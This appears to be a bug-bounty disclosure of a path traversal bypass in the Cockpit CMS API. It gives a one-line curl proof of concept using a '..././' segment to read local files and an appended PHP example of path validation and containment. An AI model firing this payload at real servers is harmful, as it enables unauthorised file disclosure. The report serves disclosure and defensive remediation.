External Control of File Name or Path in agentejo/cockpit

Valid

Reported on

Sep 9th 2021


✍️ Description

Bypass of previous fix

🕵️‍♂️ Proof of Concept

I see you recently fixed the local-file-inclusion bug https://huntr.dev/bounties/a65d700c-1561-46c1-a9c2-cba6ed960f94/.
And the fix patch is https://github.com/agentejo/cockpit/commit/f1919184998bf9fa7a7db882c98ce1410375e596.
But it can be bypassed easily using the URL below:

curl --path-as-is http://10.0.2.15:8080/api/public/..././custom?test=win

💥 Impact

local file read

Occurrences

We have contacted a member of the agentejo/cockpit team and are waiting to hear back 3 months ago
Artur validated this vulnerability 3 months ago
ranjit-git has been awarded the disclosure bounty
The fix bounty is now up for grabs
Artur confirmed that a fix has been merged on d1ea9f 3 months ago
Artur has been awarded the fix bounty
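
Why a segment like `..././` can get past a traversal filter, shown as an added example that is not taken from the report or from the Cockpit code base. It assumes the earlier patch removed `../` in a single pass (the page does not show the patch); `strip_once`, `safe_relative_path` and `resolve_inside` are hypothetical names.

```php
<?php
// Added illustration; not Cockpit code. All function names are hypothetical.

// ASSUMPTION: the bypassed filter removed "../" in one non-recursive pass.
function strip_once(string $path): string
{
    return str_replace('../', '', $path);
}

// Validate instead of rewriting: decode once, normalise separators, then
// reject the whole path if any segment is "." or "..".
function safe_relative_path(string $path): ?string
{
    $path = str_replace('\\', '/', rawurldecode($path));
    if (strpos($path, "\0") !== false) {
        return null;
    }
    $segments = [];
    foreach (explode('/', $path) as $segment) {
        if ($segment === '') {
            continue; // collapse duplicate slashes
        }
        if ($segment === '.' || $segment === '..') {
            return null;
        }
        $segments[] = $segment;
    }
    return $segments ? implode('/', $segments) : null;
}

// Second layer: resolve symlinks and confirm the target stays under $baseDir.
function resolve_inside(string $baseDir, string $relative): ?string
{
    $base = realpath($baseDir);
    $full = realpath($baseDir . DIRECTORY_SEPARATOR . $relative);
    if ($base === false || $full === false) {
        return null;
    }
    $prefix = rtrim($base, DIRECTORY_SEPARATOR) . DIRECTORY_SEPARATOR;
    return strncmp($full, $prefix, strlen($prefix)) === 0 ? $full : null;
}

// Constructed sample inputs; the third is the path segment from the report.
foreach (['custom', '../custom', '..././custom', '....//custom'] as $input) {
    printf("%-14s strip_once=%-11s validated=%s\n", $input,
        var_export(strip_once($input), true),
        var_export(safe_relative_path($input), true));
}
```

Pass the value returned by `safe_relative_path` to `resolve_inside` together with the directory the endpoint is allowed to serve, and treat `null` from either function as a rejected request.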